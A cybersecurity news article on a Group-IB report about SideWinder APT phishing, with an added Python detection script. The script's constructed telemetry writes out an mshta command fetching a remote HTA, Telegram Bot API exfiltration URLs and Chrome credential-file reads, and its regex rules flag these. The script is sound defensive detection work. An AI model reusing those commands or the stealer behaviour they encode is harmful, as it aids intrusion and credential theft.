The Cyber Security News
SideWinder APT Attacks Regional Targets in New Campaign

February 15, 2023

Security researchers have discovered dozens of new regional targets and new attack tools linked to the Indian APT group SideWinder.

The suspected state-sponsored group – also known as Rattlesnake, Hardcore Nationalist (HN2) and T-APT4 – comes under the spotlight in a new report from Group-IB, Old Snake, New Skin: Analysis of SideWinder APT activity between June and November 2021.

Over that six-month period, the threat intelligence firm found that SideWinder attempted to attack 61 government, military, law enforcement and other targets in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka.

It also linked the group to a 2020 attack on the government of the Maldives.

SideWinder’s attack vector of choice remains spear-phishing emails, which it sent to these targets throughout the period. In two campaigns the group spoofed a cryptocurrency company in its emails, Group-IB said.

If a victim clicks a malicious link in the phishing email, the link delivers a malicious document, an LNK file or the payload itself. The LNK file downloads an HTA file, which in turn downloads the payload. That payload can be a reverse shell, a remote access Trojan (RAT) or an information stealer, the report said.

Group-IB found two new home-grown tools used by SideWinder during the campaign: a RAT dubbed SideWinder.RAT.b and an info-stealer it called SideWinder.StealerPy.

The latter is designed to harvest Google Chrome browsing history, credentials saved in the browser, the list of folders in the working directory, and the metadata and contents of docx, pdf and txt files, among other data.

Both custom tools use Telegram to communicate with compromised machines rather than conventional C&C servers, because it is more convenient to do so, Group-IB said.
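The chain above (phishing link to LNK, LNK to HTA, HTA to payload), StealerPy’s harvesting of Chrome history and saved credentials, and the Telegram-based C2 each leave a distinct trace on the host or on the network. The following is an added example, not Group-IB’s code and not taken from the report, of how a detection engineer might encode those three traces as rules and run them over constructed sample telemetry. The event field names (pid, image, cmdline, parent, path, url), the sample paths and the token values are assumptions; the Telegram Bot API URL shape (api.telegram.org/bot<id>:<token>/<method>, with /file/bot<token>/… for downloads) is the public API’s documented form.

```python
"""Detection heuristics for the SideWinder delivery chain and C2 channel.

Added example, not Group-IB's code. All telemetry below is constructed inline,
and the field names are assumptions about what an EDR or proxy would export.
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List
from urllib.parse import urlparse

# Constructed process-creation events: the LNK stage runs mshta.exe against a
# remote HTA, so mshta.exe with an http(s) or inline-script argument is the tell.
PROC_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" https://update.example-invalid.test/verify.hta',
     "parent": r"C:\Windows\explorer.exe"},
    {"pid": 4188, "image": r"C:\Windows\System32\mshta.exe",  # benign: local HTA
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta',
     "parent": r"C:\Program Files\Vendor\installer.exe"},
    {"pid": 5001, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"chrome.exe" --type=renderer', "parent": r"C:\Windows\explorer.exe"},
]

# Constructed file-access events: StealerPy reads Chrome's history and saved
# credentials, SQLite files that normally only chrome.exe opens.
FILE_EVENTS = [
    {"pid": 6100, "image": r"C:\Users\Public\svchost32.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5001, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"},
]

# Constructed outbound HTTP events. Bot API C2 looks like
# https://api.telegram.org/bot<id>:<token>/<method> for uploads/tasking and
# https://api.telegram.org/file/bot<id>:<token>/<path> for downloads.
NET_EVENTS = [
    {"pid": 6100, "image": r"C:\Users\Public\svchost32.exe",
     "url": "https://api.telegram.org/bot123456789:AAHh-constructed-token-xyz/sendDocument"},
    {"pid": 2200, "image": r"C:\ops\alertbot\alertbot.exe",  # benign, allowlisted below
     "url": "https://api.telegram.org/bot987654321:BBGg-constructed-token-abc/sendMessage"},
    {"pid": 5001, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "url": "https://www.example-invalid.test/news"},
    {"pid": 6100, "image": r"C:\Users\Public\svchost32.exe",
     "url": "https://api.telegram.org/file/bot123456789:AAHh-constructed-token-xyz/documents/file_3.bin"},
]

MSHTA_IMAGE = re.compile(r"(?i)(^|\\)mshta\.exe$")
REMOTE_OR_INLINE = re.compile(r"(?i)\bhttps?://\S+|\b(javascript|vbscript):")
CHROME_SECRETS = re.compile(r"(?i)\\google\\chrome\\user data\\[^\\]+\\(login data|history)$")
BOT_API_PATH = re.compile(r"^/(?:file/)?bot(\d+):([A-Za-z0-9_-]{20,})(?:/|$)")


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_remote_mshta(events: List[Dict]) -> List[Finding]:
    """mshta.exe fetching an HTA over HTTP(S) or running inline script."""
    return [Finding("mshta_remote_hta", ev["pid"], f"{ev['parent']} -> {ev['cmdline']}")
            for ev in events
            if MSHTA_IMAGE.search(ev["image"]) and REMOTE_OR_INLINE.search(ev["cmdline"])]


def detect_chrome_secret_access(events: List[Dict]) -> List[Finding]:
    """A process other than chrome.exe opening Chrome's Login Data or History."""
    return [Finding("chrome_credential_store_access", ev["pid"], f"{ev['image']} -> {ev['path']}")
            for ev in events
            if CHROME_SECRETS.search(ev["path"]) and basename(ev["image"]) != "chrome.exe"]


def detect_telegram_bot_c2(events: List[Dict],
                           allowed_images: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Telegram Bot API traffic from any image not on the allowlist; the token is redacted."""
    findings = []
    for ev in events:
        u = urlparse(ev["url"])
        m = BOT_API_PATH.match(u.path) if u.hostname == "api.telegram.org" else None
        if not m or ev["image"].lower() in allowed_images:
            continue
        redacted = u.path[:m.start(2)] + "<redacted>" + u.path[m.end(2):]
        findings.append(Finding("telegram_bot_api_c2", ev["pid"],
                                f"{ev['image']} -> {u.hostname}{redacted}"))
    return findings


def run_detections(allowed_images: FrozenSet[str] = frozenset({r"c:\ops\alertbot\alertbot.exe"})
                   ) -> List[Finding]:
    return (detect_remote_mshta(PROC_EVENTS)
            + detect_chrome_secret_access(FILE_EVENTS)
            + detect_telegram_bot_c2(NET_EVENTS, allowed_images))


if __name__ == "__main__":
    for f in run_detections():
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Run stand-alone, the script reports one mshta finding, one Chrome credential-store finding, and two Telegram findings from the same unsigned binary in C:\Users\Public (the legitimate alert bot is suppressed by the allowlist). The Bot API token is redacted before the finding is stored, since a leaked token would let anyone read the attacker’s channel and, worse, would put a live credential in the SIEM; a real deployment would also correlate the three rules on the process tree, because pid 6100 here is both the file reader and the Telegram client.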

After analyzing the network infrastructure used by SideWinder, the vendor said it was probably the same entity as the BabyElephant APT group.

“It is not uncommon for APT groups to borrow tools from each other, which often leads to problems in attribution,” said Dmitry Kupin, Group-IB senior malware analyst.

“As such, we found that some indicators of compromise related to another APT group, Donot, had been wrongly attributed to SideWinder. Nonetheless, we found further evidence confirming that Patchwork (Hangover), Donot and SideWinder sometimes borrow tools and malicious documents from each other and modify them for their needs.”

Group-IB was unable to say how many of SideWinder’s phishing attempts were successful.


Some parts of this article are sourced from:
www.infosecurity-magazine.com



Copyright © TheCyberSecurity.News, All Rights Reserved.